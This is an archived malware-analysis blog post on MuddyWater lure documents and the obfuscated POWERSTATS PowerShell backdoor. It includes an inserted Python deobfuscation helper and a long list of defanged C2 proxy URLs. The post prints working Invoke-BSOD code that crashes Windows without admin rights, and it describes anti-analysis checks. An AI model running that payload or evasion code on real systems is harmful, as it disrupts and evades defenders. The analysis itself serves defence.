{
	"id": "49528bdf-d9a6-4470-b1f5-c123fe0d666b",
	"created_at": "2026-04-06T00:08:59.318915Z",
	"updated_at": "2026-04-10T03:34:22.6244Z",
	"deleted_at": null,
	"sha1_hash": "3ba6037dd03e2b92eae5ec5b7818723d13db4a5e",
	"title": "Clearing the MuddyWater - Analysis of new MuddyWater Samples",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 101022,
	"plain_text": "Clearing the MuddyWater - Analysis of new MuddyWater Samples\r\nBy Mo Bustami\r\nPublished: 2018-05-08 · Archived: 2026-04-05 23:37:00 UTC\r\nIt has been over two months since I last wrote about MuddyWater, or TEMP.Zagros as FireEye names the group. To be honest, I felt they were going quiet for a while; but boy was I wrong. Starting this week I have picked up some new, interesting samples. Although these new samples have a lot in common with the ones from earlier in the year, there are still some interesting aspects and, you guessed it, additional obfuscation in the new samples. The heavy focus on layered obfuscation and the preference for PowerShell are still apparent. Below I will highlight what has changed, based on the samples I have analyzed.\r\nBelow are screenshots of some of the recent lure documents used by this group. All hashes are at the end of the blog.\r\nYou can see from the above screenshots that their targeting seems to continue to focus on the Middle East region (Turkey and Iraq) and Pakistan. As mentioned in my previous blogs, these lures can give us an idea of the organizations and industries that might have been targeted by this wave.\r\nThe timeline of these lures, based on VirusTotal submission dates, runs from mid-February to the most recent sample, dated May 6, 2018, which I will focus on. The sample is named \"mofa.gov.iq.doc\" (SHA-256 94625dd8151814dd6186735a6a6a87b2a4c71c04b8402caf314fb6f98434eaad). MOFA of course stands for Ministry of Foreign Affairs.\r\nI will be analyzing the sample in detail this time. 
I will only highlight new or modified aspects of the obfuscation and any additional functionality in the POWERSTATS backdoor.\r\nThe document contains macro code with multiple Base64-encoded segments, as shown below.\r\nOnce you decode the JavaScript that is embedded in the XML file, you are presented with the below.\r\nThe decoded script is in fact a PowerShell script that performs a further decoding routine on a file called \"C:\\ProgramData\\WindowsDefenderService.ini\".\r\nThe content of this file is the encoded data from the first Base64 chunk. Once decoded, the content looks familiar: it is indeed a variant of the POWERSTATS backdoor. Let's go through a couple of the obfuscation layers used in this variant.\r\nAlthough it looks messy, it does look familiar: the character substitution functions and the character replacements. We are getting closer. You can notice in the image above the \"\u0026((vaRIABle '*MDR*').NAME[3,11,2]-jOiN'')\". This is in fact Invoke-Expression, just obfuscated: the wildcard '*MDR*' matches the built-in MaximumDriveCount variable, characters 3, 11 and 2 of that name spell \"iex\", and the \u0026 call operator runs it. This means we can replace it with Write-Output, so the layer prints the next stage instead of executing it, and the resulting script looks like this.\r\nAgain, you can notice the use of \"( $enV:ComSpEc[4,24,25]-jOiN'')\", which is also iex: with the default ComSpec value C:\\WINDOWS\\system32\\cmd.exe, characters 4, 24 and 25 are \"I\", \"e\" and \"x\". Meaning we can replace it again with Write-Output.\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 1 of 18\n\nThis circle of obfuscation keeps going until we reach the decoded script we are familiar with, including the proxy URLs and the IP identification, as shown below.\r\nThis, of course, is just one part of the big encoded PS script. The second and third parts are the actual functionality of the backdoor.\r\nMost of the functionality that I described in my last blog still exists in the new variants. However, there are some new additions and some modifications to the code:\r\nThe screenshot function is rewritten, however the same purpose remains. 
It takes a screenshot of the victim's screen, saves it as PNG, converts it to bytes, encodes it with Base64 and then uploads it to the C\u0026C.\r\nInclusion of Blue Screen of Death (BSOD) code in case a certain process is found. This is part of its anti-debugging and anti-analysis technique.\r\nThe function highlighted at the bottom of the picture, \"GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG\", leads to this piece of code:\r\nfunction GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG(){\r\n$s = @\"\r\nusing System;\r\nusing System.Runtime.InteropServices;\r\npublic static class C{\r\n[DllImport(\"ntdll.dll\")]\r\npublic static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);\r\n[DllImport(\"ntdll.dll\")]\r\npublic static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);\r\npublic static unsafe void Kill(){\r\nBoolean tmp1;\r\nuint tmp2;\r\nRtlAdjustPrivilege(19, true, false, out tmp1);\r\nNtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);\r\n}\r\n}\r\n\"@\r\n$c = new-object -typename system.CodeDom.Compiler.CompilerParameters\r\n$c.CompilerOptions = '/unsafe'\r\n$a = Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c\r\n[C]::Kill()\r\n}\r\nThis is an exact copy of the Invoke-BSOD code that was created by Barrett Adams (@peewpw) about a month ago and is available on his GitHub page. 
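Before moving on to the remaining anti-analysis checks, here is the layer-peeling step from the obfuscation section above written out as an added example (this is not code from the original post or from the sample): it resolves the two Invoke-Obfuscation style tokens, (Variable '*MDR*').Name[3,11,2] and $env:ComSpec[4,24,25], to the literal they spell, then swaps every Invoke-Expression or iex for Write-Output so that running the layer prints the next one instead of executing it. The ComSpec value and the list of built-in Maximum*Count variables are assumptions of the example (they are the Windows defaults, and the indices only spell iex where those defaults hold); the sample layer is constructed for the demo and is not the malware's text.

```python
import re

# Added example, not code from the original post or from the sample.
# Assumed host values that the obfuscated tokens index into. These are the
# Windows defaults and an assumption of this example: the indices in the
# sample only spell "iex" on hosts where they hold.
COMSPEC = 'C:\\WINDOWS\\system32\\cmd.exe'
BUILTIN_VARIABLES = [
    'MaximumAliasCount', 'MaximumDriveCount', 'MaximumErrorCount',
    'MaximumFunctionCount', 'MaximumHistoryCount', 'MaximumVariableCount',
]

# Token 1: ((Variable '*MDR*').Name[3,11,2]-join'')
VARIABLE_TOKEN = re.compile(
    r'''\(\s*\(\s*variable\s+'([^']+)'\s*\)\s*\.name\[([\d,\s]+)\]\s*-join\s*''\s*\)''',
    re.IGNORECASE)
# Token 2: ( $env:ComSpec[4,24,25]-join'')
COMSPEC_TOKEN = re.compile(
    r'''\(\s*\$env:comspec\[([\d,\s]+)\]\s*-join\s*''\s*\)''', re.IGNORECASE)
# Whatever the tokens resolve to, plus the spelled-out cmdlet, with an optional
# leading call operator (&iex) that has to go as well.
EVAL_TOKEN = re.compile(r'(?:&\s*)?\b(?:iex|invoke-expression)\b', re.IGNORECASE)


def pick_chars(source, index_list):
    '''Apply PowerShell array indexing such as [3,11,2] to a string.'''
    return ''.join(source[int(i)] for i in index_list.split(','))


def match_variable(wildcard):
    '''Resolve (Variable '*MDR*').Name the way PowerShell's -like does:
    '*' and '?' wildcards, case-insensitive, against the built-in names.'''
    rx = re.escape(wildcard).replace(r'\*', '.*').replace(r'\?', '.')
    hits = [v for v in BUILTIN_VARIABLES if re.fullmatch(rx, v, re.IGNORECASE)]
    if len(hits) != 1:
        raise ValueError(f'wildcard {wildcard!r} is ambiguous or unknown: {hits}')
    return hits[0]


def resolve_tokens(script):
    '''Replace both index-into-a-string tokens with the literal they spell.'''
    script = VARIABLE_TOKEN.sub(
        lambda m: pick_chars(match_variable(m.group(1)), m.group(2)), script)
    return COMSPEC_TOKEN.sub(lambda m: pick_chars(COMSPEC, m.group(1)), script)


def peel_layer(script):
    '''One round of the loop the post describes: resolve the tokens, then
    swap every Invoke-Expression for Write-Output so that running the layer
    prints the next layer instead of executing it. Returns the rewritten
    script and the number of swaps; zero swaps means nothing is left to
    peel and the decoded script has been reached.'''
    neutered, swaps = EVAL_TOKEN.subn('Write-Output', resolve_tokens(script))
    return neutered, swaps


# Constructed stand-in for one obfuscation layer, in the style of the tokens
# quoted in the post (this is not the malware's text).
SAMPLE_LAYER = (
    '''$inner = 'Write-Host next-layer';'''
    '''&((vaRIABle '*MDR*').NAME[3,11,2]-jOiN'') $inner;'''
    '''( $enV:ComSpEc[4,24,25]-jOiN'') $inner'''
)

if __name__ == '__main__':
    layer, swaps = peel_layer(SAMPLE_LAYER)
    print(f'{swaps} evaluation(s) neutered')
    print(layer)
```

Feed each layer the output of running the previous one through PowerShell and repeat until peel_layer reports zero swaps, which is the point the post describes as reaching the decoded script with the proxy URLs in it. The swap to Write-Output works because every evaluation in these layers takes the next stage as its argument (or on the pipeline), so the same expression that would have executed it now just prints it.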
One thing to note is that the Invoke-BSOD code can BSOD a machine without the need for admin privileges, as described by the author: RtlAdjustPrivilege(19, ...) enables SeShutdownPrivilege, which ordinary interactive users already hold on Windows workstations, and NtRaiseHardError is then called with STATUS_ACCESS_DENIED (0xC0000022) and response option 6 (OptionShutdownSystem), which bug-checks the machine on the spot.\r\nThe same function and code are also used if processes including \"cmd.exe\", \"PowerShell.exe\" or \"Powershell_ISE.exe\" exist on the victim system, so detonating the sample with a console or ISE window open crashes the box instead of running the backdoor.\r\nThere is also a function that looks for the following strings within the ProgramData folder: \"Kasper\", \"Panda\" and \"ESET\", presumably matching the ProgramData directories of Kaspersky, Panda Security and ESET products. If any is found, the screenshot and upload functions will break.\r\nProxy URLs from the decoded script (defanged):\r\nhxxp://alessandrofoglino[.]com//wp-config-ini.php\r\nhxxps://www.theharith[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.easy-home-sales[.]co.za//wp-config-ini.php\r\nhxxps://amishcountryfurnishings[.]com/awstats/wp-config-ini.php\r\nhxxp://chinamall[.]co.za//wp-config-ini.php\r\nhxxp://themotoringcalendar[.]co.za//wp-config-ini.php\r\nhxxp://bluehawkbeats[.]com//wp-config-ini.php\r\nhxxp://www.gilforsenate[.]com//wp-config-ini.php\r\nhxxp://answerstoprayer[.]org//wp-config-ini.php\r\nhxxp://mgamule[.]co.za/oldweb/wp-config-ini.php\r\nhxxp://chrisdejager-attorneys[.]co.za//wp-config-ini.php\r\nhxxp://finalnewstv[.]com//wp-config-ini.php\r\nhxxps://www.brand-stories.gr//wp-config-ini.php\r\nhxxp://www.duotonedigital[.]co.za//wp-config-ini.php\r\nhxxp://www.britishasia-equip[.]co.uk//wp-config-ini.php\r\nhxxp://www.tanati[.]co.za//wp-config-ini.php\r\nhxxp://emware[.]co.za//wp-config-ini.php\r\nhxxp://breastfeedingbra[.]co.za//wp-config-ini.php\r\nhxxp://www.androidwikihow[.]com//wp-config-ini.php\r\nhxxp://cashforyousa[.]co.za//wp-config-ini.php\r\nhxxp://hesterwebber[.]co.za//wp-config-ini.php\r\nhxxp://bramloosveld.be/trainer/wp-config-ini.php\r\nhxxp://fickstarelectrical[.]co.za//wp-config-ini.php\r\nhxxp://buchnation[.]com//wp-config-ini.php\r\nhxxp://hostingvalley[.]co.uk/downloads/wp-config-ini.php\r\nhxxp://bluefor[.]com/magento/wp-config-ini.php\r\nhxxp://foryou.guru/css/wp-config-ini.php\r\n
hxxp://www.daleth[.]co.za//wp-config-ini.php\r\nhxxps://www.buyandenjoy.pk//wp-config-ini.php\r\nhxxps://annodle[.]com/wp-includes/wp-config-ini.php\r\nhxxp://goldeninstitute[.]co.za/contents/wp-config-ini.php\r\nhxxp://advss[.]co.za/images/wp-config-ini.php\r\nhxxp://ednpk[.]com//wp-config-ini.php\r\nhxxp://proeventsports[.]co.za/wp-admin/wp-config-ini.php\r\nhxxp://glenbridge[.]co.za//wp-config-ini.php\r\nhxxp://berped[.]co.za//wp-config-ini.php\r\nhxxp://best-digital-slr-cameras[.]com//wp-config-ini.php\r\nhxxps://kamas.pk//wp-config-ini.php\r\nhxxps://bekkersweldingservice.nl//wp-config-ini.php\r\nhxxp://bogdanandreescu.fit//wp-config-ini.php\r\nhxxp://www.bashancorp[.]co.za//wp-config-ini.php\r\nhxxps://www.bmcars.nl/wp-admin/wp-config-ini.php\r\nhxxp://visionclinic[.]co.ls/visionclinic/wp-config-ini.php\r\nhxxps://www.antojoentucocina[.]com//wp-config-ini.php\r\nhxxp://www.ihlosiqs-pm[.]co.za//wp-config-ini.php\r\nhxxp://capitalradiopetition[.]co.za//wp-config-ini.php\r\nhxxp://www.generictoners[.]co.za//wp-config-ini.php\r\nhxxp://almaqsd[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.alessioborzuola[.]com/downloads/wp-config-ini.php\r\nhxxp://briskid[.]com//wp-config-ini.php\r\nhxxp://bios-chip[.]co.za//wp-config-ini.php\r\nhxxp://www.crissamconsulting[.]co.za//wp-config-ini.php\r\nhxxp://capriflower[.]co.za//wp-config-ini.php\r\nhxxp://www.dingaanassociates[.]co.za//wp-config-ini.php\r\nhxxp://batistadopovosjc[.]org.br//wp-config-ini.php\r\nhxxp://indiba-africa[.]co.za//wp-config-ini.php\r\nhxxp://apollonweb[.]com//wp-config-ini.php\r\nhxxps://www.amighini.it/webservice/wp-config-ini.php\r\n
hxxp://blackrabbitthailand[.]com//wp-config-ini.php\r\nhxxp://batthiqbal[.]com/sagenda/webroot/wp-config-ini.php\r\nhxxp://clandecor[.]co.za/rvsUtf8Backup/wp-config-ini.php\r\nhxxp://bakron[.]co.za//wp-config-ini.php\r\nhxxp://gsnconsulting[.]co.za//wp-config-ini.php\r\nhxxp://vumavaluations[.]co.za//wp-config-ini.php\r\nhxxp://heritagetravelmw[.]com//wp-config-ini.php\r\nhxxp://www.moboradar[.]com/wp-includes/wp-config-ini.php\r\nhxxps://news9pakistan[.]com/wp-includes/wp-config-ini.php\r\nhxxp://havilahglo[.]co.za/wpscripts/wp-config-ini.php\r\nhxxp://binaries.site/wink/wp-config-ini.php\r\nhxxp://www.bestdecorativemirrors[.]com/More-Mirrors/wp-config-ini.php\r\nhxxp://clouditzone[.]com/revolution/assets/wp-config-ini.php\r\nhxxp://delectronics[.]com.pk//wp-config-ini.php\r\nhxxps://boudua[.]com//wp-config-ini.php\r\nhxxp://baynetins[.]com//wp-config-ini.php\r\nhxxp://insafradio.pk/pos/wp-config-ini.php\r\nhxxp://www.harmonyguesthouse[.]co.za//wp-config-ini.php\r\nhxxp://fsproperties[.]co.za/engine1/wp-config-ini.php\r\nhxxp://desirablehair[.]co.za//wp-config-ini.php\r\nhxxp://comsip[.]org.mw//wp-config-ini.php\r\nhxxp://www.wbdrivingschool[.]com//wp-config-ini.php\r\nhxxp://jdcorporate[.]co.za/catalog/wp-config-ini.php\r\nhxxp://bradleysherrer[.]com/wp/wp-config-ini.php\r\nhxxp://debnoch[.]com/image/wp-config-ini.php\r\nhxxp://adsbook[.]co.za//wp-config-ini.php\r\n
hxxp://host4unix.net/host24new/wp-config-ini.php\r\nhxxp://jvpsfunerals[.]co.za//wp-config-ini.php\r\nhxxp://immaculatepainters[.]co.za//wp-config-ini.php\r\nhxxp://tcpbereka[.]co.za/js/wp-config-ini.php\r\nhxxp://investaholdings[.]co.za/htc/wp-config-ini.php\r\nhxxp://tuules[.]com//wp-config-ini.php\r\nhxxp://findinfo-more[.]com//wp-config-ini.php\r\nhxxp://bmorecleaning[.]com//wp-config-ini.php\r\nhxxp://www.goolineb2b[.]com//wp-config-ini.php\r\nhxxp://www.triconfabrication[.]com/wp-includes/wp-config-ini.php\r\nhxxp://irshadfoundation[.]co.za//wp-config-ini.php\r\nhxxp://www.blattoamsterdam[.]com//wp-config-ini.php\r\nhxxp://ladiescircle[.]co.za//wp-config-ini.php\r\nhxxp://domesticguardians[.]co.za/Banner/wp-config-ini.php\r\nhxxp://jhphotoedits[.]co.za//wp-config-ini.php\r\nhxxp://iqra[.]co.za/pub/wp-config-ini.php\r\nhxxps://bestbedrails.reviews//wp-config-ini.php\r\nhxxp://www.banditrockradio[.]com//wp-config-ini.php\r\nhxxp://burgercoetzeeattorneys[.]co.za//wp-config-ini.php\r\nhxxp://burgeystikihut[.]com//wp-config-ini.php\r\nhxxp://alphaobring[.]com//wp-config-ini.php\r\nhxxp://www.galwayprimary[.]co.za//wp-config-ini.php\r\nhxxps://lahorewholesalemarket[.]com//wp-config-ini.php\r\nhxxp://bitandbyte62[.]com/faibrescia/wp-config-ini.php\r\nhxxp://www.bioforgehealth[.]org//wp-config-ini.php\r\nhxxp://www.brianzashop.it//wp-config-ini.php\r\n
hxxp://geetransfers[.]co.za/font-awesome/wp-config-ini.php\r\nhxxps://www.blubaytrading[.]com//wp-config-ini.php\r\nhxxp://carlagrobler[.]co.za/components/wp-config-ini.php\r\nhxxp://btfila[.]org/wp-includes/wp-config-ini.php\r\nhxxp://lensofafrica[.]co.za//wp-config-ini.php\r\nhxxp://greenacrestf[.]co.za/video/wp-config-ini.php\r\nhxxp://www.tonaro[.]co.za//wp-config-ini.php\r\nhxxp://www.amphibiblechurch[.]com/wp-admin/wp-config-ini.php\r\nhxxp://bumpapps[.]com/apps/wp-config-ini.php\r\nhxxp://ambiances-toiles.fr//wp-config-ini.php\r\nhxxp://dailyqadamat[.]com//wp-config-ini.php\r\nhxxp://tophillsports[.]com//wp-config-ini.php\r\nhxxp://chrishanicdc[.]org/wpimages/wp-config-ini.php\r\nhxxp://architectsinc.net/mail/wp-config-ini.php\r\nhxxp://www.ieced[.]com.pk//wp-config-ini.php\r\nhxxp://entracorntrading[.]co.za//wp-config-ini.php\r\nhxxps://www.besman.de//wp-config-ini.php\r\nhxxp://chickenandkitchen[.]com//wp-config-ini.php\r\nhxxps://www.hosthof[.]com//wp-config-ini.php\r\nhxxp://signsoftime[.]co.za//wp-config-ini.php\r\nhxxp://www.be-indigene.be//wp-config-ini.php\r\nhxxp://absfinancialplanning[.]co.za/images/wp-config-ini.php\r\nhxxp://charispaarl[.]co.za//wp-config-ini.php\r\nhxxp://indlovusecurity[.]co.za//wp-config-ini.php\r\nhxxp://elemech[.]com.pk//wp-config-ini.php\r\nhxxp://bafflethink[.]com/administrator/wp-config-ini.php\r\n
hxxp://luxconprojects[.]co.za//wp-config-ini.php\r\nhxxp://brandr.ge//wp-config-ini.php\r\nhxxps://www.amateurastronomy[.]org//wp-config-ini.php\r\nhxxp://comfortex[.]co.za/php/wp-config-ini.php\r\nhxxp://deepgraphics[.]co.za//wp-config-ini.php\r\nhxxps://iconicciti[.]com//wp-config-ini.php\r\nhxxp://www.bazookagames.net//wp-config-ini.php\r\nhxxp://sefikengfarm[.]co.ls//wp-config-ini.php\r\nhxxp://passright[.]co.za//wp-config-ini.php\r\nhxxp://aboutduvetcovers[.]com//wp-config-ini.php\r\nhxxp://seismicfactory[.]co.za//wp-config-ini.php\r\nhxxp://abadleabantu[.]co.za//wp-config-ini.php\r\nhxxp://www.gooline.net//wp-config-ini.php\r\nhxxp://bookdoctormeeting[.]com//wp-config-ini.php\r\nhxxps://aquabsafe[.]com//wp-config-ini.php\r\nhxxp://amatikulutours[.]com/tmp/wp-config-ini.php\r\nhxxp://alemaohost[.]com/meniskoumantareas.gr/public_html/tmp/wp-config-ini.php\r\nhxxp://archersassociationofamerica[.]org//wp-config-ini.php\r\nhxxps://www.baossdigital[.]com/wp-includes/wp-config-ini.php\r\nhxxp://rightwayfoundationpk[.]org/wp-admin/wp-config-ini.php\r\nhxxp://bmasokaprojects[.]co.za//wp-config-ini.php\r\nhxxp://itengineering[.]co.za/gatewaydiamond/wp-config-ini.php\r\nhxxp://globalelectricalandconstruction[.]co.za/wpscripts/wp-config-ini.php\r\nhxxp://adriaanvorster[.]co.za//wp-config-ini.php\r\nhxxps://www.boutiquesxxx[.]com//wp-config-ini.php\r\nhxxp://buildingstandards[.]com.pk//wp-config-ini.php\r\n
hxxp://jakobieducation[.]co.za//wp-config-ini.php\r\nhxxp://breakoutmonitor.info//wp-config-ini.php\r\nhxxps://besttweezers.reviews//wp-config-ini.php\r\nhxxp://ldams[.]org.ls/supplies/wp-config-ini.php\r\nhxxp://menaboracks[.]co.za/tmp/wp-config-ini.php\r\nhxxp://fourseasonscaterersdecorators[.]com//wp-config-ini.php\r\nhxxp://capetownway[.]co.za//wp-config-ini.php\r\nhxxp://hartenboswaterpark[.]co.za/templates/wp-config-ini.php\r\nhxxp://fccorp[.]co.za/php/wp-config-ini.php\r\nhxxp://angar68[.]com//wp-config-ini.php\r\nhxxp://www.bestarticlespinnerr[.]com/wp-admin/wp-config-ini.php\r\nhxxp://serversvalley[.]com//wp-config-ini.php\r\nhxxp://breakbyte[.]com//wp-config-ini.php\r\nhxxps://www.logicsfort[.]com//wp-config-ini.php\r\nhxxp://blackwolfco[.]com//wp-config-ini.php\r\nhxxp://www.exomi.es/wp-admin/wp-config-ini.php\r\nhxxp://verifiedseller[.]co.za/js/wp-config-ini.php\r\nhxxps://www.bolagsregistrering.eu//wp-config-ini.php\r\nhxxp://cdxtrading[.]co.za//wp-config-ini.php\r\nhxxp://aahung[.]org//wp-config-ini.php\r\nhxxps://rstextilesourcing[.]com//wp-config-ini.php\r\nhxxps://bravori[.]com//wp-config-ini.php\r\nhxxp://buboobioinnovations[.]co.za/wpimages/wp-config-ini.php\r\nhxxp://www.advcadsys[.]com//wp-config-ini.php\r\nhxxp://isibaniedu[.]co.za/admin/wp-config-ini.php\r\nhxxp://dianakleyn[.]co.za/layouts/wp-config-ini.php\r\n
hxxp://amesoulcoaching[.]com/wp-admin/wp-config-ini.php\r\nhxxp://www.loansonhomes[.]co.za//wp-config-ini.php\r\nhxxp://empowerbridge[.]com/projects/abianasystem/wp-config-ini.php\r\nhxxp://alfredocifuentes[.]com//wp-config-ini.php\r\nhxxp://www.gooline.pk//wp-config-ini.php\r\nhxxp://highschoolsuperstar[.]co.za/files/wp-config-ini.php\r\nhxxps://bogjerlow[.]com/project/wp-config-ini.php\r\nhxxp://cafawelding[.]co.za/font-awesome/wp-config-ini.php\r\nhxxp://apalawyers.pt//wp-config-ini.php\r\nhxxp://www.edesignz[.]co.za//wp-config-ini.php\r\nhxxp://centuryacademy[.]co.za/css/wp-config-ini.php\r\nhxxp://buenasia[.]com/wp-includes/wp-config-ini.php\r\nhxxp://ceramica[.]co.za//wp-config-ini.php\r\nhxxp://banjo.la//wp-config-ini.php\r\nhxxp://www.alfredoposada[.]com//wp-config-ini.php\r\nhxxp://allisonplumbing[.]com//wp-config-ini.php\r\nhxxp://eastrandmotorlab[.]co.za/fleet/wp-config-ini.php\r\nhxxp://www.mikimaths[.]com//wp-config-ini.php\r\nhxxp://hjb-racing[.]co.za/htdocs/wp-config-ini.php\r\nhxxp://welcomecaters[.]com//wp-config-ini.php\r\nhxxp://www.andreabelfi[.]com//wp-config-ini.php\r\nhxxp://www.iancullen[.]co.za//wp-config-ini.php\r\nhxxp://jeanetteproperties[.]co.za//wp-config-ini.php\r\nhxxps://www.bridgestobodhi[.]org//wp-config-ini.php\r\nhxxp://www.rejoicetheatre[.]com//wp-config-ini.php\r\nhxxps://alterwebhost[.]com//wp-config-ini.php\r\n
hxxp://dpscdgkhan.edu.pk/shopping/wp-config-ini.php\r\nhxxp://edgeforensic[.]co.za//wp-config-ini.php\r\nhxxp://willpowerpos[.]co.za//wp-config-ini.php\r\nhxxp://colenesphotography[.]co.za/modules/wp-config-ini.php\r\nhxxp://bfval[.]com/tmp/wp-config-ini.php\r\nhxxps://aliart.nl//wp-config-ini.php\r\nhxxps://bosacik.sk//wp-config-ini.php\r\nhxxp://mailingservers.net//wp-config-ini.php\r\nhxxp://fbrvolume[.]co.za//wp-config-ini.php\r\nhxxp://9newshd[.]com//wp-config-ini.php\r\nhxxp://bartabee[.]com//wp-config-ini.php\r\nhxxp://www.khotsonglodge[.]co.ls//wp-config-ini.php\r\nhxxp://erniecommunications[.]co.za/js/wp-config-ini.php\r\nhxxp://promechtransport[.]co.za/scripts/wp-config-ini.php\r\nhxxp://centuriongsd[.]co.za//wp-config-ini.php\r\nhxxp://delcom[.]co.za//wp-config-ini.php\r\nhxxp://www.andrebruton[.]com//wp-config-ini.php\r\nhxxp://h-dubepromotions[.]co.za//wp-config-ini.php\r\nhxxps://bestcoolingtowels.reviews//wp-config-ini.php\r\nhxxp://crystaltidings[.]co.za//wp-config-ini.php\r\nhxxp://diegemmerkat[.]co.za//wp-config-ini.php\r\nhxxp://funisalodge[.]co.za/data1/wp-config-ini.php\r\nhxxp://www.hfhl[.]org.ls/habitat/wp-config-ini.php\r\nhxxp://experttutors[.]co.za//wp-config-ini.php\r\nhxxps://www.cartridgecave[.]co.za//wp-config-ini.php\r\nhxxp://ecs-consult[.]com//wp-config-ini.php\r\n
hxxp://oftheearthphotography[.]com/www/wp-config-ini.php\r\nhxxp://hmholdings360[.]co.za//wp-config-ini.php\r\nhxxp://joyngroup[.]com//wp-config-ini.php\r\nhxxp://www.bertflierdesign.nl//wp-config-ini.php\r\nhxxp://seoinlahorepakistan[.]com/clockwork/wp-config-ini.php\r\nhxxp://africanpixels.zar.cc//wp-config-ini.php\r\nhxxp://cazochem[.]co.za/cazochem/wp-config-ini.php\r\nhxxp://ryanchristiefurniture[.]co.za//wp-config-ini.php\r\nhxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/wp-config-ini.php\r\nhxxp://arabsdeals[.]com//wp-config-ini.php\r\nhxxp://www.fun4kidz[.]co.za//wp-config-ini.php\r\nhxxp://www.infratechconsulting[.]com//wp-config-ini.php\r\nhxxp://courtesydriving[.]co.za/js/wp-config-ini.php\r\nhxxp://bluecrome[.]com//wp-config-ini.php\r\nhxxp://charliewestsecurity[.]co.za//wp-config-ini.php\r\nhxxps://buildyoursalon[.]com/wp-includes/wp-config-ini.php\r\nhxxp://beehiveholdingszar[.]co.za//wp-config-ini.php\r\nhxxp://servicebox[.]co.za//wp-config-ini.php\r\nhxxp://www.malboer[.]co.za/trendy1/wp-config-ini.php\r\nhxxp://biondi[.]co//wp-config-ini.php\r\nhxxp://funeralbusinesssolution[.]com/email_template/wp-config-ini.php\r\nhxxp://ushostinc[.]com/ioncube/wp-config-ini.php\r\nhxxps://alceharfield[.]com//wp-config-ini.php\r\nhxxp://indocraft[.]co.za/test/wp-config-ini.php\r\nhxxp://www.londonbeautyclinic.pk/wp-includes/wp-config-ini.php\r\nhxxp://sullivanprimary[.]co.za//wp-config-ini.php\r\n
hxxp://btg4hope[.]org//wp-config-ini.php\r\nhxxp://bo-crm[.]com/corel[.]com.bo/wp-config-ini.php\r\nhxxp://abvsecurity[.]co.za//wp-config-ini.php\r\nhxxp://cambridgetuts[.]com//wp-config-ini.php\r\nhxxps://bestaxi.nl//wp-config-ini.php\r\nhxxp://jwseshowe[.]co.za/assets/wp-config-ini.php\r\nhxxp://winagainstebola[.]com//wp-config-ini.php\r\nhxxp://anubandh.in//wp-config-ini.php\r\nhxxps://bgadvocaten.nl/wp-admin/wp-config-ini.php\r\nhxxp://freeskl[.]com/sports/wp-config-ini.php\r\nhxxp://www.abies[.]co.za//wp-config-ini.php\r\nhxxps://www.applecartng[.]com//wp-config-ini.php\r\nhxxps://bakayokocpa[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.paktechinfo[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.ariehandomri[.]com//wp-config-ini.php\r\nhxxp://lahorecoolingtower[.]com//wp-config-ini.php\r\nhxxps://boatwif[.]co.uk//wp-config-ini.php\r\nhxxp://gideonitesprojects[.]com//wp-config-ini.php\r\nhxxp://www.koshcreative[.]co.uk/wp-includes/wp-config-ini.php\r\nhxxp://iinvest4u[.]co.za//wp-config-ini.php\r\nhxxps://blankwebagency[.]com/components/wp-config-ini.php\r\nhxxp://hybridauto[.]co.za/photography/wp-config-ini.php\r\nhxxp://h-u-i[.]co.za/heiren/wp-config-ini.php\r\nhxxp://insta-art[.]co.za//wp-config-ini.php\r\nhxxp://abanganifunerals[.]co.za//wp-config-ini.php\r\nhxxp://muallematsela[.]com//wp-config-ini.php\r\n
hxxps://arhiepiscopiabucurestilor.ro/templates/wp-config-ini.php\r\nhxxp://perfectlabels.net//wp-config-ini.php\r\nhxxps://www.alvarezarquitectos[.]com//wp-config-ini.php\r\nhxxp://boardaffairs[.]com//wp-config-ini.php\r\nhxxp://www.m-3[.]co.za//wp-config-ini.php\r\nhxxp://beesrenovations[.]co.za/images/wp-config-ini.php\r\nhxxp://bumbledyne[.]com/domainmod/wp-config-ini.php\r\nhxxps://blockchainadvertisements.net//wp-config-ini.php\r\nhxxp://mokorotlocorporate[.]com//wp-config-ini.php\r\nhxxp://alchimiegrafiche.net/bbdelteatro/wp-config-ini.php\r\nhxxps://bentivegna.es//wp-config-ini.php\r\nhxxp://in2accounting[.]co.za//wp-config-ini.php\r\nhxxp://capewindstrading[.]co.za//wp-config-ini.php\r\nhxxp://bonus.rocks//wp-config-ini.php\r\nhxxp://cloudhub[.]co.ls/modules/wp-config-ini.php\r\nhxxp://bansko-furniture[.]co.uk//wp-config-ini.php\r\nhxxp://digital-cameras-south-africa[.]co.za/script/wp-config-ini.php\r\nhxxp://ahmadhasanat[.]com//wp-config-ini.php\r\nhxxp://hosthof.pk/customer/wp-config-ini.php\r\nhxxps://www.engeltjieakademie[.]co.za//wp-config-ini.php\r\nhxxp://juniorad[.]co.za/vendor/wp-config-ini.php\r\nhxxp://www.dws-gov[.]co.za//wp-config-ini.php\r\nhxxp://www.getcord[.]co.za//wp-config-ini.php\r\nhxxps://brokedudepodcast[.]com//wp-config-ini.php\r\nhxxp://balaateen[.]co.za/less/wp-config-ini.php\r\nhxxp://2strongmagazine[.]co.za//wp-config-ini.php\r\n
